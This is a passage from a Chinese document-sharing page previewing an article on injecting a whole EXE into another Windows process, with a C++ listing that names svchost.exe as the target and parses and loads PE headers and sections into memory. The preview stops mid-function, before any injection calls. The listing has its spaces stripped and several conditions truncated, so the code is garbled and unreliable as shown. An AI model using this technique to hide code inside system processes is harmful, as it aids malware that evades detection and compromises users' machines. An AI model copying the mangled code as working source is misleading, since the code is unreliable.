进程空间中插入另一个进程的代码细节化.docx
- 文档编号:11768272
- 上传时间:2023-04-01
- 格式:DOCX
- 页数:20
- 大小:19.69KB
进程空间中插入另一个进程的代码细节化.docx
《进程空间中插入另一个进程的代码细节化.docx》由会员分享,可在线阅读,更多相关《进程空间中插入另一个进程的代码细节化.docx(20页珍藏版)》请在冰豆网上搜索。
进程空间中插入另一个进程的代码细节化
在进程空间中插入另一个进程的代码细节化
在InjectDLLIntoProcess的技术司空见惯的时代,江湖上出现了更令人惊讶InjectThreadIntoProcess的技术,
不过这些Injection的功能多有局限性,如果可以InjectEXE(Process)IntoProcess该多好啊,习习~~其实InjectEXE的
技术早已不是什么新东西,只是原先的InjectEXE是Linux/Unix的东西,没有几个成功被改造成Windows版的......
*/
复制内容到剪贴板
代码:
#include"stdafx.h"
#include"windows.h"
#include"tlhelp32.h"
#include"ntpsapi.h"
structPE_Header
{
unsignedlongsignature;
unsignedshortmachine;
unsignedshortnumSections;
unsignedlongtimeDateStamp;
unsignedlongpointerToSymbolTable;
unsignedlongnumOfSymbols;
unsignedshortsizeOfOptionHeader;
unsignedshortcharacteristics;
};
structPE_ExtHeader
{
unsignedshortmagic;
unsignedcharmajorLinkerVersion;
unsignedcharminorLinkerVersion;
unsignedlongsizeOfCode;
unsignedlongsizeOfInitializedData;
unsignedlongsizeOfUninitializedData;
unsignedlongaddressOfEntryPoint;
unsignedlongbaseOfCode;
unsignedlongbaseOfData;
unsignedlongimageBase;
unsignedlongsectionAlignment;
unsignedlongfileAlignment;
unsignedshortmajorOSVersion;
unsignedshortminorOSVersion;
unsignedshortmajorImageVersion;
unsignedshortminorImageVersion;
unsignedshortmajorSubsystemVersion;
unsignedshortminorSubsystemVersion;
unsignedlongreserved1;
unsignedlongsizeOfImage;
unsignedlongsizeOfHeaders;
unsignedlongchecksum;
unsignedshortsubsystem;
unsignedshortDLLCharacteristics;
unsignedlongsizeOfStackReserve;
unsignedlongsizeOfStackCommit;
unsignedlongsizeOfHeapReserve;
unsignedlongsizeOfHeapCommit;
unsignedlongloaderFlags;
unsignedlongnumberOfRVAAndSizes;
unsignedlongexportTableAddress;
unsignedlongexportTableSize;
unsignedlongimportTableAddress;
unsignedlongimportTableSize;
unsignedlongresourceTableAddress;
unsignedlongresourceTableSize;
unsignedlongexceptionTableAddress;
unsignedlongexceptionTableSize;
unsignedlongcertFilePointer;
unsignedlongcertTableSize;
unsignedlongrelocationTableAddress;
unsignedlongrelocationTableSize;
unsignedlongdebugDataAddress;
unsignedlongdebugDataSize;
unsignedlongarchDataAddress;
unsignedlongarchDataSize;
unsignedlongglobalPtrAddress;
unsignedlongglobalPtrSize;
unsignedlongTLSTableAddress;
unsignedlongTLSTableSize;
unsignedlongloadConfigTableAddress;
unsignedlongloadConfigTableSize;
unsignedlongboundImportTableAddress;
unsignedlongboundImportTableSize;
unsignedlongimportAddressTableAddress;
unsignedlongimportAddressTableSize;
unsignedlongdelayImportDescAddress;
unsignedlongdelayImportDescSize;
unsignedlongCOMHeaderAddress;
unsignedlongCOMHeaderSize;
unsignedlongreserved2;
unsignedlongreserved3;
};
structSectionHeader
{
unsignedcharsectionName[8];
unsignedlongvirtualSize;
unsignedlongvirtualAddress;
unsignedlongsizeOfRawData;
unsignedlongpointerToRawData;
unsignedlongpointerToRelocations;
unsignedlongpointerToLineNumbers;
unsignedshortnumberOfRelocations;
unsignedshortnumberOfLineNumbers;
unsignedlongcharacteristics;
};
structMZHeader
{
unsignedshortsignature;
unsignedshortpartPag;
unsignedshortpageCnt;
unsignedshortreloCnt;
unsignedshorthdrSize;
unsignedshortminMem;
unsignedshortmaxMem;
unsignedshortreloSS;
unsignedshortexeSP;
unsignedshortchksum;
unsignedshortexeIP;
unsignedshortreloCS;
unsignedshorttablOff;
unsignedshortoverlay;
unsignedcharreserved[32];
unsignedlongoffsetToPE;
};
structImportDirEntry
{
DWORDimportLookupTable;
DWORDtimeDateStamp;
DWORDfowarderChain;
DWORDnameRVA;
DWORDimportAddressTable;
};
structFixupBlock
{
unsignedlongpageRVA;
unsignedlongblockSize;
};
#defineTARGETPROC"svchost.exe";
typedefstruct_PROCINFO
{
DWORDbaseAddr;
DWORDimageSize;
}PROCINFO;
BOOLEXPD=False;
CHAR*PID;
//**********************************************************************************************************
//
//ThisfunctionreadstheMZ,PE,PEextendedandSectionHeadersfromanEXEfile.
//
//**********************************************************************************************************
boolreadPEInfo(FILE*fp,MZHeader*outMZ,PE_Header*outPE,PE_ExtHeader*outpeXH,
SectionHeader**outSecHdr)
{
fseek(fp,0,SEEK_END);
longfileSize=ftell(fp);
fseek(fp,0,SEEK_SET);
if(fileSize { printf("Filesizetoosmall\n"); returnfalse; } //readMZHeader MZHeadermzH; fread(&mzH,sizeof(MZHeader),1,fp); if(mzH.signature! =0x5a4d) //MZ { printf("FiledoesnothaveMZheader\n"); returnfalse; } printf("OffsettoPEHeader=%X\n",mzH.offsetToPE); if((unsignedlong)fileSize { printf("Filesizetoosmall\n"); returnfalse; } //readPEHeader fseek(fp,mzH.offsetToPE,SEEK_SET); PE_HeaderpeH; fread(&peH,sizeof(PE_Header),1,fp); printf("Sizeofoptionheader=%d\n",peH.sizeOfOptionHeader); printf("Numberofsections=%d\n",peH.numSections); if(peH.sizeOfOptionHeader! =sizeof(PE_ExtHeader)) { printf("Unexpectedoptionheadersize.\n"); returnfalse; } //readPEExtHeader PE_ExtHeaderpeXH; fread(&peXH,sizeof(PE_ExtHeader),1,fp); printf("Importtableaddress=%X\n",peXH.importTableAddress); printf("Importtablesize=%X\n",peXH.importTableSize); printf("Importaddresstableaddress=%X\n",peXH.importAddressTableAddress); printf("Importaddresstablesize=%X\n",peXH.importAddressTableSize); //readthesections SectionHeader*secHdr=newSectionHeader[peH.numSections]; fread(secHdr,sizeof(SectionHeader)*peH.numSections,1,fp); *outMZ=mzH; *outPE=peH; *outpeXH=peXH; *outSecHdr=secHdr; returntrue; } //********************************************************************************************************** // //ThisfunctioncalculatesthesizerequiredtoloadanEXEintomemorywithproperalignment. // //********************************************************************************************************** intcalcTotalImageSize(MZHeader*inMZ,PE_Header*inPE,PE_ExtHeader*inpeXH, SectionHeader*inSecHdr) { intresult=0; intalignment=inpeXH->sectionAlignment; if(inpeXH->sizeOfHeaders%alignment==0) result+=inpeXH->sizeOfHeaders; else { intval=inpeXH->sizeOfHeaders/alignment; val++; result+=(val*alignment); } for(inti=0;i { if(inSecHdr[i].virtualSize) { if(inSecHdr[i].virtualSize%alignment==0) result+=inSecHdr[i].virtualSize; else { intval=inSecHdr[i].virtualSize/alignment; val++; result+=(val*alignment); } } } returnresult; } //********************************************************************************************************** // //Thisfunctioncalculatesthealignedsizeofasection // //********************************************************************************************************** unsignedlonggetAlignedSize(unsignedlongcurSize,unsignedlongalignment) { if(curSize%alignment==0) returncurSize; else { intval=curSize/alignment; val++; return(val*alignment); } } //********************************************************************************************************** // //ThisfunctionloadsaPEfileintomemorywithproperalignment. //EnoughmemorymustbeallocatedatptrLoc. // //********************************************************************************************************** boolloadPE(FILE*fp,MZHeader*inMZ,PE_Header*inPE,PE_ExtHeader*inpeXH, SectionHeader*inSecHdr,LPVOIDptrLoc) { char*outPtr=(char*)ptrLoc; fseek(fp,0,SEEK_SET); unsignedlongheaderSize=inpeXH->sizeOfHeaders; //certainPEfileshavesectionHeaderSizevalue>sizeofPEfileitself. //thisloophandlesthissituationbyfindthesectionthatisnearesttothe //PEheader. for(inti=0;i { if(inSecHdr[i].pointerToRawData headerSize=inSecHdr[i].pointerToRawData; } //readthePEheader unsignedlongreadSize=fread(outPtr,1,headerSize,fp); printf("HeaderSize=%d\n",headerSize); if(readSize! =headerSize) { printf("Errorreadingheaders(%d%d)\n",readSize,headerSize); returnfalse; } outPtr+=getAlignedSize(inpeXH->sizeOfHeaders,inpeXH->sectionAlignment); //readthesections for(i=0;i { if(inSecHdr[i].sizeOfRawData>0) { unsignedlongtoRead=inSecHdr[i].sizeOfRawData; if(toRead>inSecHdr[i].virtualSize) toRead=inSecHdr[i].virtualSize; fseek(fp,inSecHdr[i].pointerToRawData,SEEK_SET); readSize=fread(outPtr,1,toRead,fp); if(readSize! =toRead) { printf("Errorreadingsection%d\n",i); returnfalse; } outPtr+=getAlignedSize(inSecHdr[i].virtualSize,inpeXH->sectionAlignment); } else { //thishandlesthe
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 进程 空间 插入 另一个 代码 细节